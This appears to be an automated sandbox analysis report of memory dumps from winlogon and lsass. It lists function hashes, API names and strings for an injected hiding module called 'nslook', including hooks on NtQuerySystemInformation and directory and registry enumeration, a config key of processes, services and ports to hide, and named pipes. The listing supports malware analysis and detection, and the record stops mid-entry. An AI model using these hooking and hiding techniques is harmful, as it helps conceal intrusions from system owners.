                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: CountCriticalInitializeSectionSpintry_get_function
                            • String ID: InitializeCriticalSectionEx
                            • API String ID: 539475747-3084827643
                            • Opcode ID: 8e6a3fe44e534738534d9a01dabf262b013e09a9fbdd3e3c06b7ef608cce99ba
                            • Instruction ID: c4afb344ce288393bc91545898738fa608b72c3e5a75de42af0a843adea9db2d
                            • Opcode Fuzzy Hash: 8e6a3fe44e534738534d9a01dabf262b013e09a9fbdd3e3c06b7ef608cce99ba
                            • Instruction Fuzzy Hash: 93F05E3631379081EE1A9BC6B9406E52268E789B88F484039E95917BD9CF38C48FC742
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002A.00000002.508754328.000001AFDDD00000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001AFDDD00000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_42_2_1afddd00000_winlogon.jbxd
                            Similarity
                            • API ID: Valuetry_get_function
                            • String ID: FlsSetValue
                            • API String ID: 738293619-3750699315
                            • Opcode ID: 3752bcc65c7c5609300ea25ac4cfde0f10294ffc29cf2283e288bad232694535
                            • Instruction ID: b618eeded865b2ba63fad67f49416b7abbeb1aa83fd95d95196119805e1298e3
                            • Opcode Fuzzy Hash: 3752bcc65c7c5609300ea25ac4cfde0f10294ffc29cf2283e288bad232694535
                            • Instruction Fuzzy Hash: DCE0927630364191EF1A4BD4F8406E8232AE7CA788F48403ED90A073D5CE38C88FC302
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: CurrentFileModuleNameProcessProtectVirtual$CreateFindHandlePathThread_invalid_parameter_noinfo
                            • String ID: nslook
                            • API String ID: 2570614652-925916808
                            • Opcode ID: f1d8bc74bf052771e52778655c87fe18c3546f35a08540481f72330a9496183f
                            • Instruction ID: dcc2e83fdd852ef67f17a6b0ccffd3eb0ce3fa7ff6a42ce8c6185e14426c83e4
                            • Opcode Fuzzy Hash: f1d8bc74bf052771e52778655c87fe18c3546f35a08540481f72330a9496183f
                            • Instruction Fuzzy Hash: B5414925615B4082FB689B21F4ACB9A27B1F74CB88F44442DDB8A4A794EF7DC188C748
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: Open$Close$Sleep
                            • String ID:
                            • API String ID: 3308825301-0
                            • Opcode ID: 0335e562c384ed4ab1b4dfda930fd32856ca0767eaff0783c008b7edfd4736cd
                            • Instruction ID: fe619fbb74f11101744f5577c4ddf1baf52b86de80cc706a6918003e6afd4ee2
                            • Opcode Fuzzy Hash: 0335e562c384ed4ab1b4dfda930fd32856ca0767eaff0783c008b7edfd4736cd
                            • Instruction Fuzzy Hash: 29E0E61062570554FE946766ACDDF991299E74C7CCF1C043C9B4D4F792ED3880D9530D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510307520.00000240B2B80000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2B80000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2b80000_lsass.jbxd
                            Similarity
                            • API ID: LibraryLoad
                            • String ID:
                            • API String ID: 1029625771-0
                            • Opcode ID: 08772dcd6b70912aa01ac8df599671afdeafe4e5ce07d66a2e7adf18228cebbd
                            • Instruction ID: 10603fc9934f911dc8bfe334a8204fe3a1cbc36b8d5954e21b846d035cc5e1c9
                            • Opcode Fuzzy Hash: 08772dcd6b70912aa01ac8df599671afdeafe4e5ce07d66a2e7adf18228cebbd
                            • Instruction Fuzzy Hash: C481EE7370169087DB558F15D49CB6A77A9FB48B98F098128DF0E0F384EE38D892C705
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: CloseOpen$Concurrency::cancel_current_taskEnumInfoQueryValuelstrcmpilstrlen
                            • String ID: SOFTWARE\nslookconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                            • API String ID: 2205723969-4286660177
                            • Opcode ID: 7cf5cfbc156c7f14cfbef28fc8ad97089fc617735fd991efd10034e53f37ea62
                            • Instruction ID: 36d96ed6ba9acfdb5b1d227e47fa163c3954f2918317e92d1a09cf9de4e0edce
                            • Opcode Fuzzy Hash: 7cf5cfbc156c7f14cfbef28fc8ad97089fc617735fd991efd10034e53f37ea62
                            • Instruction Fuzzy Hash: 70C13432610B108AE710DF62E89CB9E77B8F788B88F05841ADB895BB55DF78C594C744
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                            • String ID:
                            • API String ID: 1239891234-0
                            • Opcode ID: d18354117ab1f5ea70f659ee65f3239325a9cd384c952b0dc72439d0b55e665e
                            • Instruction ID: b08139070d3228eaf542e35dbef6c80b101419e437285916c82d3c7cfe1eb281
                            • Opcode Fuzzy Hash: d18354117ab1f5ea70f659ee65f3239325a9cd384c952b0dc72439d0b55e665e
                            • Instruction Fuzzy Hash: 98316D36214F8086DB648F25E88C79E77B0F788798F50011AEB9D4BB98DF38C295CB04
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: ErrorFileLastWrite$Console
                            • String ID:
                            • API String ID: 786612050-0
                            • Opcode ID: fe26169f788e9b9e7868ecd312231555bbb6a3c1c65eac13abe60d826e8fca9f
                            • Instruction ID: e50231c2316fade2453f452b56489106d5647e766db4a23dab7845d94281d02a
                            • Opcode Fuzzy Hash: fe26169f788e9b9e7868ecd312231555bbb6a3c1c65eac13abe60d826e8fca9f
                            • Instruction Fuzzy Hash: A8D1EE72714B809AEB00CB64D48CADD7BB1F74979CF54421ACF8A6BB99DE38C196C704
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: AddressHandleModuleProc$CurrentThread
                            • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                            • API String ID: 4239977575-1975688563
                            • Opcode ID: 581cd848fa1035c490543cb2f1aec387bc8739e25c5ec99f8b392157e34e0f20
                            • Instruction ID: 5a230cfe1715b951945824e4d79379b3b11e199d200754eb448e630aac9c39b6
                            • Opcode Fuzzy Hash: 581cd848fa1035c490543cb2f1aec387bc8739e25c5ec99f8b392157e34e0f20
                            • Instruction Fuzzy Hash: 1B915324612B0591FE55DB14F8DCB9832A4FB5C79CF98582D874A0E2A8EF38C6D9C31D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: lstrcmpi$Pathlstrcpy$Combinelstrcatlstrcmp$FileFinalHandleNameType_invalid_parameter_noinfolstrlen
                            • String ID: \\.\pipe\$\\?\$nslook
                            • API String ID: 4069998685-1812639415
                            • Opcode ID: 50d4ea44a64ca543742431b3508c0a7aed6a82b491e0e1d75679c31f8e3d45a7
                            • Instruction ID: 2a7cabc3e4d2bbc14bf58373884e0d3b61dc8e79d07c0b4028e9064b987b7d51
                            • Opcode Fuzzy Hash: 50d4ea44a64ca543742431b3508c0a7aed6a82b491e0e1d75679c31f8e3d45a7
                            • Instruction Fuzzy Hash: C1F17D32704B818AEB649F25E8DCB9977B1F78DB98F444019DB494BB98DF38C586C704
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: FileName$HandleModule$CloseFindOpenPathProcesslstrcmplstrcmpilstrcpylstrlen$AddressProc
                            • String ID: NtQueryObject$\Device\Nsi$nslook$ntdll.dll
                            • API String ID: 3769777229-563693742
                            • Opcode ID: 496234189980b66b35517f7b6b95b357656e0bd266c31318b27ed9856b3f4fb1
                            • Instruction ID: 957cbcf540196e97f36ae8f4c2b067a49a7b491543009e4450804e1a4775df9b
                            • Opcode Fuzzy Hash: 496234189980b66b35517f7b6b95b357656e0bd266c31318b27ed9856b3f4fb1
                            • Instruction Fuzzy Hash: 55F19D7670569086EB648F16E88CBA973A4F78CB88F45402ADF4A4B784DF38D884C749
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: FileFinalHandleNamePathTypelstrcpylstrlen
                            • String ID: \\.\pipe\$\\?\$nslook
                            • API String ID: 2439355722-1812639415
                            • Opcode ID: 9e899848ac98aaae3b00dc27d34a77e62faabf36e755eb9f180771f864e619b8
                            • Instruction ID: 6ff4464cc617da9bf3d74b1ba0b0a4967fa998d0100f28d241e82ef3fca12e61
                            • Opcode Fuzzy Hash: 9e899848ac98aaae3b00dc27d34a77e62faabf36e755eb9f180771f864e619b8
                            • Instruction Fuzzy Hash: 029164262047C485EB749F11E8DCBAA77A0F78DB88F444019DF894BB99DF38D586CB08
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                            • String ID: \\.\pipe\nslookchildproc32$\\.\pipe\nslookchildproc64
                            • API String ID: 2171963597-3427204187
                            • Opcode ID: b5ec5d932adaaccfcfd4fa9355584f9921bfd3a42b27b8747176e760f82e137a
                            • Instruction ID: 3b47049c092ea82d01c2fdadaf86b792e8e4f0a42d6ff81b3fe22daa87d5e0fd
                            • Opcode Fuzzy Hash: b5ec5d932adaaccfcfd4fa9355584f9921bfd3a42b27b8747176e760f82e137a
                            • Instruction Fuzzy Hash: 12310B26204A4086EB249F25F49CB5A77B4F78DBA9F4401299F9D0BB58DF3DC5898B04
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph
                            (graph image not extracted; basic blocks 240b2bb86ec-240b2bb8a0a, CRT startup code referencing __scrt_dllmain_crt_thread_attach and __scrt_dllmain_after_initialize_c)
                            APIs
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_release_startup_lock
                            • String ID:
                            • API String ID: 2904100720-0
                            • Opcode ID: b9fba9ebf33b7b9b553ca47caecb391e479f2e9c425bbd4e168cab60532678ed
                            • Instruction ID: 58aff0be08f7dc76270194fecfa1a5bddf324a8db837ccbc2bfa305193924b24
                            • Opcode Fuzzy Hash: b9fba9ebf33b7b9b553ca47caecb391e479f2e9c425bbd4e168cab60532678ed
                            • Instruction Fuzzy Hash: 01811621A0464586FF54AB66A8CDF9922A0FB8D78CF54892D9B484F796DF38C8C1870C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph
                            (graph image not extracted; basic blocks 240b2b87aec-240b2b87e0a, CRT startup code referencing __scrt_dllmain_crt_thread_attach and __scrt_dllmain_after_initialize_c)
                            APIs
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510307520.00000240B2B80000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2B80000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2b80000_lsass.jbxd
                            Similarity
                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_release_startup_lock
                            • String ID:
                            • API String ID: 2904100720-0
                            • Opcode ID: 6b35b8212f2284779f27ca5c5da834cb643104800c9213282adef094c912fac4
                            • Instruction ID: 8b597d54eb5fc7d6e9b64eca6af6811637a8f7bd36bf8a37e83b1fc64afd121b
                            • Opcode Fuzzy Hash: 6b35b8212f2284779f27ca5c5da834cb643104800c9213282adef094c912fac4
                            • Instruction Fuzzy Hash: EA81CF6661464587FA50AB6998CDFA96399F78E78CF08441DDB0C4F3D6EE3CC8C1A708
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph
                            (graph image not extracted; basic blocks 240b2bb3c30-240b2bb3f16, with repeated calls to lstrcmpW and lstrcmpiW)
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: lstrcmplstrcmpi$_invalid_parameter_noinfo
                            • String ID: nslook
                            • API String ID: 125796670-925916808
                            • Opcode ID: e4eebad3085524bd7cc81e0496f3330c115c18a0ef6aff813f55017ca675ca3a
                            • Instruction ID: 84f0738f36f0818e0b7d6e5e431691e48fe11b0d06a16fffce8992d4a7ebc084
                            • Opcode Fuzzy Hash: e4eebad3085524bd7cc81e0496f3330c115c18a0ef6aff813f55017ca675ca3a
                            • Instruction Fuzzy Hash: 9D81A97A301A5496EB588F26E5DCB2973A0F748B88F05402EDB0A4FA94DF35D4D5C31A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: EnumInfoQueryValuelstrcmplstrcmpilstrcpylstrlen
                            • String ID: d
                            • API String ID: 760382566-2564639436
                            • Opcode ID: 58b6d380fd7a19ccaffb75ac57d677b01951afe1390cb8a1d5f168405babf2dd
                            • Instruction ID: 8ea77a832d00c1cd5c760fd4ffaa9f7b66c4af0d407b711541f64af49faac976
                            • Opcode Fuzzy Hash: 58b6d380fd7a19ccaffb75ac57d677b01951afe1390cb8a1d5f168405babf2dd
                            • Instruction Fuzzy Hash: 96516D72214B8097EB64DB11F99CB9EB3A4F78DB88F044429DB994BB54DF38D1A1CB04
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph
                            (graph image not extracted; basic blocks 240b2bb44f0-240b2bb474b, with calls to GetModuleHandleW, VirtualProtectEx, TerminateThread and GetCurrentThread)
                            APIs
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: Current$ProcessProtectThreadVirtual$HandleModuleTerminate
                            • String ID:
                            • API String ID: 23076575-0
                            • Opcode ID: 5580002a2b36d1ec19da4d38e3baa73b2c19332edb1061c5b354992008b38483
                            • Instruction ID: ba0114cf4e94f0fd01f91b147343ee2320e116306217b9bdfacf3d88b846a27b
                            • Opcode Fuzzy Hash: 5580002a2b36d1ec19da4d38e3baa73b2c19332edb1061c5b354992008b38483
                            • Instruction Fuzzy Hash: 0561F725625B4581EE95DF15F4DCB9923A0FB4C788F44142DAB8E0B7A5EF38C588C708
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph
                            (graph image not extracted; basic blocks 240b2bba140-240b2bba28b, with calls to LoadLibraryExW, GetProcAddress and FreeLibrary)
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: Library$Load$AddressErrorFreeLastProc
                            • String ID: api-ms-
                            • API String ID: 2559590344-2084034818
                            • Opcode ID: 76b065093d340fa5aa374eaa269705a9f04a9f25d7b6574202371576915819bd
                            • Instruction ID: 407aae76d2b6a61b93dc32e7542d18c9b53626ef23f20a96690c7a35e9ef659a
                            • Opcode Fuzzy Hash: 76b065093d340fa5aa374eaa269705a9f04a9f25d7b6574202371576915819bd
                            • Instruction Fuzzy Hash: 7D31D521B12B4095EE569B06A88CF9963A4F75CFACF69452DDF690F791EF38C0C48308
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: lstrcmpi$_invalid_parameter_noinfolstrcatlstrcpy
                            • String ID: \\.\pipe\$nslook
                            • API String ID: 1773417096-2374292202
                            • Opcode ID: 71d271135564fef6ce2879b451260b98d48cbe5236b6da59abfcb7c1adabd234
                            • Instruction ID: dc7c7a4027ceea7bb38ae882a01c016e8a7f67472f317638fc2dfd4d9a14736c
                            • Opcode Fuzzy Hash: 71d271135564fef6ce2879b451260b98d48cbe5236b6da59abfcb7c1adabd234
                            • Instruction Fuzzy Hash: 9B319A663006418AEB288B26D4DCBA97772FB4CB8CF444019CF0A4F798DF38C986C308
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: lstrcmpi$_invalid_parameter_noinfolstrcatlstrcpy
                            • String ID: \\.\pipe\$nslook
                            • API String ID: 1773417096-2374292202
                            • Opcode ID: a4f58ddb0ec7a1ac9b520ccabc6490d736c06cf39181273cdad02b7e49ae0e4c
                            • Instruction ID: 5f8c6942e31cdb37ffa6b4ea8b13cf0e1180d39b96592aa9b2b145ae0690042f
                            • Opcode Fuzzy Hash: a4f58ddb0ec7a1ac9b520ccabc6490d736c06cf39181273cdad02b7e49ae0e4c
                            • Instruction Fuzzy Hash: 46317E2660468492EF64AF25E8DCBA97360FB4CB88F44401DCF4A4B694DF38D58AC709
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                            • String ID: CONOUT$
                            • API String ID: 3230265001-3130406586
                            • Opcode ID: 27f30534f6eca3e4b76c3b3a5b2f55ab59f44af5952072018eae61c579aa4f13
                            • Instruction ID: 1400b188e2c8f9f5262fabc8ca190b0768661122814c56924e9a44837d3d1f75
                            • Opcode Fuzzy Hash: 27f30534f6eca3e4b76c3b3a5b2f55ab59f44af5952072018eae61c579aa4f13
                            • Instruction Fuzzy Hash: CE118F22310B4086E7548B56F88CB1976B0F78CFF8F144229EB5E8B7A4CF78C9948748
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: lstrcmpi
                            • String ID:
                            • API String ID: 1586166983-0
                            • Opcode ID: ce154f4429541e23164c92ae9c75826ca88459982102bc68580caac79a690ae3
                            • Instruction ID: f2faaf32269abfe26da97f746682e8ac56b654f183422956acc082096e212c60
                            • Opcode Fuzzy Hash: ce154f4429541e23164c92ae9c75826ca88459982102bc68580caac79a690ae3
                            • Instruction Fuzzy Hash: D0C13A36722A4486EBA4CF1AD1CCB2973A1F39CB98F598419CB194B790DF35D8D1C708
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: Thread$Current$Context
                            • String ID:
                            • API String ID: 1666949209-0
                            • Opcode ID: 112745dca1d9940aee9ba0f7cc7e8e0e80d3374185eaee056ac988d214650fbc
                            • Instruction ID: 08fefa85f01c6c7c64e24bee5712529b4d4b352143ab9c5101c22843d6c8b675
                            • Opcode Fuzzy Hash: 112745dca1d9940aee9ba0f7cc7e8e0e80d3374185eaee056ac988d214650fbc
                            • Instruction Fuzzy Hash: 2FD16A76209B8885DA709B16E4DC75AB7B0F3CCB88F54411AEB8D4BBA5DF38C591CB04
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: AddressFreeHandleLibraryModuleProc
                            • String ID: CorExitProcess$mscoree.dll
                            • API String ID: 4061214504-1276376045
                            • Opcode ID: c0888126ef0aec4d50884ac5792c080854fdb6b5603553d00752df973eadfd71
                            • Instruction ID: ba5e4b32bd0f995bd507b5271cf72f3e1503205cba38542ec332761640530dba
                            • Opcode Fuzzy Hash: c0888126ef0aec4d50884ac5792c080854fdb6b5603553d00752df973eadfd71
                            • Instruction Fuzzy Hash: 7EF03061721A4082FF589B60E8DDBA92374EB8CB59F44241EEB4B4E665DF3CC5C8C718
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: CurrentThread
                            • String ID:
                            • API String ID: 2882836952-0
                            • Opcode ID: a5677a038b55d8d76fe810e20bdc73de9dbac67e160872f0c0df855017d297c9
                            • Instruction ID: 441f54a0eb2e66258e734fd0b5d0d80732c2ac0c53cdc1db346244779bd950fd
                            • Opcode Fuzzy Hash: a5677a038b55d8d76fe810e20bdc73de9dbac67e160872f0c0df855017d297c9
                            • Instruction Fuzzy Hash: 0002CC32519B8486EB60CB55E49C75AB7B0F3C8798F105019EB8E87BA9DF7DC894CB04
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                            • String ID:
                            • API String ID: 2210144848-0
                            • Opcode ID: eca7fc05c2f44761dbcadaf0bbc50f34caa22c00f8231d2c3b604388e5753dc9
                            • Instruction ID: 5d846ac24dcb18f50906e3af5791fd1b77f6ba8a42add3e75f8a9824043836c5
                            • Opcode Fuzzy Hash: eca7fc05c2f44761dbcadaf0bbc50f34caa22c00f8231d2c3b604388e5753dc9
                            • Instruction Fuzzy Hash: 93818E22620A1489FB14DB65D8DCBAD27A0F74CB9CF44421AEF5A6B795DF3484C2C728
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: CurrentThread
                            • String ID:
                            • API String ID: 2882836952-0
                            • Opcode ID: e3fcfa5ac0ebfbde2ff02e9ac01ebc0fc7258c68d43b414eb0961e0bb892ddad
                            • Instruction ID: e232bb0fb573ffeb00f639744c2c1219f4c50d6209540319722f44bb60852fb6
                            • Opcode Fuzzy Hash: e3fcfa5ac0ebfbde2ff02e9ac01ebc0fc7258c68d43b414eb0961e0bb892ddad
                            • Instruction Fuzzy Hash: 8C616B76519A4486E6608B16E49CB5AB7A0F38C788F10511EEB8E4BBA4DF78C990CF04
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510527443.00000240B2BB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2BB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2bb0000_lsass.jbxd
                            Similarity
                            • API ID: _set_statfp
                            • String ID:
                            • API String ID: 1156100317-0
                            • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                            • Instruction ID: 0d8a3b26d4a35de414f976303527f907e7ef6524ff95a158df72a7caff83e744
                            • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                            • Instruction Fuzzy Hash: 6711CC23A54A4541F758112CE8DEB663140EBEC37CF94462DAF7B5E7EA8E3988C1820D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Memory Dump Source
                            • Source File: 0000002C.00000002.510307520.00000240B2B80000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000240B2B80000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_44_2_240b2b80000_lsass.jbxd
                            Similarity
                            • API ID: _set_statfp
                            • String ID:
                            • API String ID: 1156100317-0
                            • Opcode ID: 7c8cf4f4356880d358edfb0bdf00968b5fd6df14598648be04d9af7c821d71cb
                            • Instruction ID: ee0cc1c35b284aaa0ba4e07b8d95da65153a3a9668daaabd7a50fddbc6349172
                            • Opcode Fuzzy Hash: 7c8cf4f4356880d358edfb0bdf00968b5fd6df14598648be04d9af7c821d71cb
